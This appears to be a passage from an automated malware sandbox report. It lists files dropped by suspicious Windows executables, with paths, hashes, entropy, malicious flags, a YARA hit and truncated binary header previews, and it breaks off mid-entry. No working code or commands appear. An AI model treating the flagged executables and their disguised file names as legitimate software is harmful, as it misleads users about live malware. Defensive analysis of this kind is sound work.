                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvincwdt.k2z.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wxyxkspd.efo.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1640960
                                                                                                                                                                                                                                Entropy (8bit):6.484662993855079
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
                                                                                                                                                                                                                                MD5:D1BA9412E78BFC98074C5D724A1A87D6
                                                                                                                                                                                                                                SHA1:0572F98D78FB0B366B5A086C2A74CC68B771D368
                                                                                                                                                                                                                                SHA-256:CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
                                                                                                                                                                                                                                SHA-512:8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2469936
                                                                                                                                                                                                                                Entropy (8bit):6.434916453080517
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
                                                                                                                                                                                                                                MD5:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                SHA1:FE54B31B0DB8665AA5B22BED147E8295AFC88A03
                                                                                                                                                                                                                                SHA-256:A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
                                                                                                                                                                                                                                SHA-512:140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\driverRemote_debug\groupware.wav

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):20891
                                                                                                                                                                                                                                Entropy (8bit):5.41735141652497
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:lhFF7DUQMnBNgCxPE/7tDEZAXMtV3STIxyd3A3lafgfdl6ii04ZQoUXXhnF6b2xD:fBMYqPE/7tDEZAK3STIxnlrn6U4ZhUXp
                                                                                                                                                                                                                                MD5:FCE67E49E191BC3FD22997050C92BA01
                                                                                                                                                                                                                                SHA1:34C08D6D404A94C2447B671A49731364EA0B47FF
                                                                                                                                                                                                                                SHA-256:F8EB44951269696615DFA62E8221C73D8EBCE0A820211956D5BF6C0A70C6DACF
                                                                                                                                                                                                                                SHA-512:4C4E1F908824DAA7F3081773CA22138C756601C6C6113E0DCF9CBC958E90A5028D9BE7E5404F19432D70B1E90D46919274188718D29F9A46B97E7ACBE8222991
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:.j.yvH.w....F.....m....^.OL`......c.`..Ldqsp.N.....v...\ae].yH.E.`^..d...m.W.U....L......]q..]hbT.Y.TLNcOP`.r.C.Lv.A...V^Fg.dr.i.^..o.GXp.H......yu...xEIAb.LGn_Y.........gjE[...hkhU..A..Adq.QlsO...`Rt..J]..s..u.j.......[lcxNuN.ZoANK..yth]q..t..DL.A`..Q.`_P...x.\..`..I.G.b.Iml.....MVfq.r[sE.HV..a.h.W.d.[QF.N...P.uaFNBdFj.s.W...x...Y...ZJ..x.u.iCyeyv.QxL.O..j.ckOGE^..xSv...^W].S.k\.en.VIuYfSuS...qu...f....K..]f...._.O.O.o.d...m.OArv...Lq....menEX..d..Qf..\FiRd.L.Vu.t.BJ...u.RR.JekI.PDg..g.H....\k..F..LX.a_.m..Bj.brCBh...v.a....ch.D[...G.....D....j.NaelL.F.^a.a.ur.^.tsN..ZH.Io.N.tr.f.exr.D.SNbHIR....]Jb.D.nlu..B.LnY..jp.n...bpmqb...Kc..y.ut.N._m.G.r.c..y.m..]cF.V.F...sMC.yrv..i....O..IAvn.vn..B.A.w.BDF...]M....b.G.XlB.xar..g.q...N..AU.E.Ox....R..k...vaP...S..sQ.....R[O..I.I.dma.T..S.E.y.a.FG...wOk..Q..\U.]..`..x\Z...ps.J..F.....Qf...Z.Pi.L..P.b.\.Tm.P.R.B.PU..d...k..[iS^.TH^N.hjrwwg._....wL....[.I.rt..g.]x..qh[Y.H.xn.N...A..wRF..W.V....jyU.Du.o...p..vO.m.lOTjk.HW.......L.dO....C..bQ.L..i.

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\driverRemote_debug\macrospore.indd

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1385173
                                                                                                                                                                                                                                Entropy (8bit):7.824453259021933
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:3ThHnVpIact6qMIPrpLhmwg9lUKOxrcP4912kZp/GYOQWINQvshJC6lVwymgw:DhHVfC6q7PrpLhmwDKOxrg4r2kEINQvX
                                                                                                                                                                                                                                MD5:31885BEFE89EAE873D959F47BB548157
                                                                                                                                                                                                                                SHA1:4A1D665C491D334EAE72CDD5B784F2A064A8FBBF
                                                                                                                                                                                                                                SHA-256:A06A3D6810B4B5F73A0B71487F9B32538C34F66E26F0DC1632F3D40BF0E11B71
                                                                                                                                                                                                                                SHA-512:0C1561929D19E52229E8FE3295148C8E4BC73526A59028F9FBB5BD11D2A8163CC6137232B55082AA1FC1E5F444F583064F4BC7BF282730B754BEE3C9656ED5D0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..ZJpL.......C\.bFNR.cgl\..j.......\u...KRCMZ....KY^.L..ap...BbB..J\.qH..o.e....]OZuwL..Nnvv..f.F.fV.T......n..Q....yhai....P.......l........O.sO.dX.RdX...L.i.q..UNub..IJ..C....FH.uq.xn..^Cfs..pb....RUlHfEr`..U....^wcX..Se.uYkc..kb.Z[O..K.F.u.i..pibZ]_O.`....\UJpL.eJ`..ro.xE.mJ]O.R...D.Cft...J..feJ...IuHV.fpvV.xnW.XaN..A..Z.JupSsC..u.N.Gm..j.L..[R.....Yv]U..hrwy.jV...oSK...ffiH..H.RK.gmJw.i.uK..rN.Ei.\PHj...gE...C..dC...u...N._.fYV.e.d.a..M.T....sd.k.....S.w.....R`k......Sd.Kg.i.\.m..p.w.s...]Gx..e^....Q...PBs.\W.e.Xv.....D.a[K].[V.Ku.^Q.s...Gu.d.LO.l.YN...k....QD.\..JN.tUG...OeM.KR..uK.t..V.RB.\.h.h....d.HA.t.i...[.an...y.....``^EiEXul.gUG..uH..Z.nGU....H..O.D...s.P.kmoSk.[ZVvO..X..ae..LqtTN..K.PDn...........]rZOy.V.Mq.bgP....xM..VD__....iup[.\Ma....ty.PKFid..g..nThl..w...ub......o.j.R.e....iuLb.p..wA.].d.f....Ub...mV.Xvv.U.f.E..A..Zv.ZP.d......LVi_...O..nwI\N.F...d..y..j..^C.Hu.Am[Jw.S]ul..d.m[..UQT.Hl..QDC.uZ..Ds.Z..W.X.w..^....ryJi`lj...O...xJ..jNVU.se.c.I.D.....O....P\GW`...Zn.E.x

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1596416
                                                                                                                                                                                                                                Entropy (8bit):6.466475314379774
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:h2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTMq+PDXx1lWz0pd:tmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
                                                                                                                                                                                                                                MD5:EA945E6BC518D0B25AAC0FCE13AE6E16
                                                                                                                                                                                                                                SHA1:4144AC69F72190F1AD163A7CC7BD38E18109122C
                                                                                                                                                                                                                                SHA-256:6D9D8727E9D8C00EB74B27C6EE3FDC90D538F30CF6A07C4B939A03FC70CE59EE
                                                                                                                                                                                                                                SHA-512:4E2F4CF61FC6364DDACA6B0BF6D917F8E136526DC1323A8BAA48166CB291285491CC2D083B65EBE30F3DC27F62B2E154A834C721140E6004596D655269239A95
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..|....p...............................}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\ff086fda

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                File Type:PNG image data, 3680 x 2256, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7175750
                                                                                                                                                                                                                                Entropy (8bit):7.997145606333841
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:98304:vH6iII1nFLrq9NF65iY3YZ019+s71up2h92Xf41tiE6Lldqib9dKuhSyVF8ZYGXO:/THrqMo097ughAPM6R5b9dXXvRRHmRqj
                                                                                                                                                                                                                                MD5:15FE0C4C282DF938F0AE415334FC8D11
                                                                                                                                                                                                                                SHA1:0B97FA302ED3F3C2B5DBB2DC8F0386E578EBC14D
                                                                                                                                                                                                                                SHA-256:EE44025DB5AD03B33944BF734F6F256D8B996E89F2EC22197C1767FBAE70853D
                                                                                                                                                                                                                                SHA-512:FAE66F89BC0007D59570A87EF815295A9499299086BBD2418DD17176C814A9FFC4559FC99B9FA2A1EC14E9D18B4206CE406CC483F04691F3A644CB6A84F932B5
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:.PNG........IHDR...`............{.. .IDATx..w\.......ET...kF...Ix...i...*ZVv...+%#eU....v.......:.\.....~..<.t...\.}.|.c.....................................................................@.,...............................W.................................._.$................................... ................................U@.,...............................W.................................._.$....................OLwM.#3q...Lk.<w......u@..J/..gQV..k...+.GyO..P".U@e.ep.g...>.L.../8..E...&Sv7a..'.........(WHLA....:7..\....9....}p=)....t..kUhW...".c.c.E..}).o..._X.......e3c.(.0........V.._.2...7..5.^-.i..8y..v.C..r..o.?~.f.HU...........8....3...?.........Y...&|.:.ZE..).;]..R.Z...KLxzT{.D.&.....I-.e.EM~Z.s.......W]at.sr~.[.Lyv..V:....s..U..bc...mQ[..-......E'-.......=."..e........g.Y.T.....v..q..N..;[....$..t........[P).....&..~g.gj...R...r..y......$.V=.*+......,.V. ..~.j.....`.....S...4._..%1..U...n...I....}.eb6.W.........d........i.}g..F9,[.*.

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u69w.1.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):89
                                                                                                                                                                                                                                Entropy (8bit):4.612480060639111
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:qRXQmfzIojaFKWiLGgKqr5iYJQEB82en:qNzVGFKDLGgKK5ifPn
                                                                                                                                                                                                                                MD5:A3DF7E83121B19D98AF8E93D0E7A16D9
                                                                                                                                                                                                                                SHA1:1EA34D1635425195AA010D74BEFFB2FA72945AB2
                                                                                                                                                                                                                                SHA-256:D5AF45E4F4BF4BC9E820141387DECBF8A8D53A8DE0144F43915AB9D67BD99F12
                                                                                                                                                                                                                                SHA-512:FEAB5C9EAB8DA62139C6B73DA13C35A6D0FC3D05B448CFCA43795731AC34D81ED25BE69F78B96AAF892E0FC8D4042B18A145F9FFA49E1264F71BC10BA99E492A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:[04/23/24 21:37:42] Main : Another instance of the download manager is already running...

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u1hw.0.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):325120
                                                                                                                                                                                                                                Entropy (8bit):6.523543971601626
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:0U7+A0a8Ga/QpvLEnbA+QQAZXZzMbqQR4bZBKxh0SnWo6mzQ6dp8Kbz65X0Cn8Kq:CQa/Q5Hv5Aj0A6mzQuGUzr5KqbI
                                                                                                                                                                                                                                MD5:BCF475BE78F3965DD066CA8DABBEB31F
                                                                                                                                                                                                                                SHA1:6CD341FEA9D92DC88722A3BA01EC820159A32356
                                                                                                                                                                                                                                SHA-256:94B32F3EEB16CE61BBBE25514219B34C1A9427AD1CF18CB1FCED2891323C0287
                                                                                                                                                                                                                                SHA-512:1921C30937D1D88A6AF70773995E03BE43FA2FC23BEE0C2A583BA437662602218AB1CC63D0CBB8DE41C2D0E1DD874A069A2A9AD509AB065335CD33B309C07DF9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L.....Md............................O?............@..........................0......OJ..........................................P....p..................................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc........p.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u1hw.1.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4866096
                                                                                                                                                                                                                                Entropy (8bit):6.542818068158205
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
                                                                                                                                                                                                                                MD5:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                SHA1:E10F3434EF3021C399DBBA047832F02B3C898DBD
                                                                                                                                                                                                                                SHA-256:4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
                                                                                                                                                                                                                                SHA-512:CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u1hw.1.exe, Author: Joe Security
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u2r8.0.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):325120
                                                                                                                                                                                                                                Entropy (8bit):6.523543971601626
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:0U7+A0a8Ga/QpvLEnbA+QQAZXZzMbqQR4bZBKxh0SnWo6mzQ6dp8Kbz65X0Cn8Kq:CQa/Q5Hv5Aj0A6mzQuGUzr5KqbI
                                                                                                                                                                                                                                MD5:BCF475BE78F3965DD066CA8DABBEB31F
                                                                                                                                                                                                                                SHA1:6CD341FEA9D92DC88722A3BA01EC820159A32356
                                                                                                                                                                                                                                SHA-256:94B32F3EEB16CE61BBBE25514219B34C1A9427AD1CF18CB1FCED2891323C0287
                                                                                                                                                                                                                                SHA-512:1921C30937D1D88A6AF70773995E03BE43FA2FC23BEE0C2A583BA437662602218AB1CC63D0CBB8DE41C2D0E1DD874A069A2A9AD509AB065335CD33B309C07DF9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L.....Md............................O?............@..........................0......OJ..........................................P....p..................................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc........p.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u2r8.1.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4866096
                                                                                                                                                                                                                                Entropy (8bit):6.542818068158205
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
                                                                                                                                                                                                                                MD5:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                SHA1:E10F3434EF3021C399DBBA047832F02B3C898DBD
                                                                                                                                                                                                                                SHA-256:4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
                                                                                                                                                                                                                                SHA-512:CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u2r8.1.exe, Author: Joe Security
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u33c.0.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):325120
                                                                                                                                                                                                                                Entropy (8bit):6.523543971601626
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:0U7+A0a8Ga/QpvLEnbA+QQAZXZzMbqQR4bZBKxh0SnWo6mzQ6dp8Kbz65X0Cn8Kq:CQa/Q5Hv5Aj0A6mzQuGUzr5KqbI
                                                                                                                                                                                                                                MD5:BCF475BE78F3965DD066CA8DABBEB31F
                                                                                                                                                                                                                                SHA1:6CD341FEA9D92DC88722A3BA01EC820159A32356
                                                                                                                                                                                                                                SHA-256:94B32F3EEB16CE61BBBE25514219B34C1A9427AD1CF18CB1FCED2891323C0287
                                                                                                                                                                                                                                SHA-512:1921C30937D1D88A6AF70773995E03BE43FA2FC23BEE0C2A583BA437662602218AB1CC63D0CBB8DE41C2D0E1DD874A069A2A9AD509AB065335CD33B309C07DF9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L.....Md............................O?............@..........................0......OJ..........................................P....p..................................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc........p.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u33c.1.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4866096
                                                                                                                                                                                                                                Entropy (8bit):6.542818068158205
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
                                                                                                                                                                                                                                MD5:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                SHA1:E10F3434EF3021C399DBBA047832F02B3C898DBD
                                                                                                                                                                                                                                SHA-256:4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
                                                                                                                                                                                                                                SHA-512:CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u33c.1.exe, Author: Joe Security
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\u46g.0.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):325120
                                                                                                                                                                                                                                Entropy (8bit):6.523543971601626
                                                                                                                                                                                                                                Encrypted:false
